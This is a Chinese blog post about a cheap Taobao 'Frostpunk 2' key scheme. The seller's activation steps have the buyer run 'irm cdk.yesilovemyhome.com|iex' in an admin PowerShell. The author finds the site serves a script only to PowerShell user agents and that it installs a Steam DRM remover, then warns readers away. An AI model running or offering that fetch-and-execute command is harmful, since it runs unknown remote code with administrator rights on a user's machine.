steam假入库的trick

 1.前言

冰汽时代2出了，貌似是因为故意给玩家道德抉择的缘故，导致网上充斥不少骂声。

正巧本人刚刚玩了一代冰汽时代，之后被灵魂拷问“这一切值得吗？”，随即怀疑人生，就像一个震碎三观的炸弹飞了过来，给我本就没多正的三观震的更加稀碎。于是就想看看第二部11bit拉的史到底是什么口味的。

但是我还不怎么想花钱挨拷问赤石，还懒得steam两小时退款，还懒得找盗版资源，那么我该怎么办捏？于是打开万能淘宝发现一个6.25r的《冰汽时代2》，寻思这个大概率是共享或者盗版之类，不过不想花时间，不想花精力，那只能小花点钱呗。

2.发现端倪

付完款之后，客服给我发了个激活步骤，看着这个激活步骤就感觉不大对，正常的应该是给cdkey-输入-激活。他们的却是先用管理员身份打开powershell，输入一个命令：irm cdk.yesilovemyhome.com|iex，之后输入一个cdk，就可激活成功。但是问题来了，这个未知的命令我不大敢随便输，莫名有种不安感，就像即将在公司服务器上输入sudo rm -rf那样不安。

防止是恶意程序，还是先研究一下比较好。

3.分析问题

首先我把商家给我的激活码在steam上尝试激活，意料之中的失败。那么既然如此，问题一定存在前面那个命令上，那么是什么意思呢？我们来看看：

这个命令分两部分：irm 、cdk.yesilovemyhome.com|iex

首先irm是什么意思呢？访问后面的网址。iex是什么意思呢？是“将获取的字符串作为命令执行”

 也就是说，这个命令是访问cdk.yesilovemyhome.com，将结果作为命令来执行。

那么我们点开这个网址看看：

好，那么好，看来是做了跳转，如果我们在postman里打开会是什么样的呢？

欢迎来到steam！看来还是跳转了。

那么问题来了，总不能是这个网站和steam合作低价出售cdk吧？

应该是做了跳转，那么问题来了，postman和powershell请求这个url的区别在哪？

同一个网站，可以在不同端呈现出不同的页面，比如我拿ie浏览器和谷歌浏览器访问某个url，他们可以根据User-Agent来判断，那么让我们来试试把User-Agent改成powershell来看看？

果然打开的页面不一样了，为了清晰，我打开许久不用的idea（上次在我自己电脑上打开好像是几个月前了）

既然是powershell，应该有相关的脚本。比如ps1，outfile等这种关键字

那么打开这个试试？

http://cdk.yesilovemyhome.com?ak=1

如果浏览器打开还是会跳转steam首页，那么该postman梅开二度了

其中这两个应该是下载的文件，我们放入浏览器下载一下试试

得到这个，咱们搜一下看看是干什么的

drm清除器，就是绕过steam保护的一个东西，会更改你本地的文件，但是貌似容易被红信。珍爱生命，远离假入库。

所有命运的馈赠都早已在暗中标好了价格。                                ——茨威格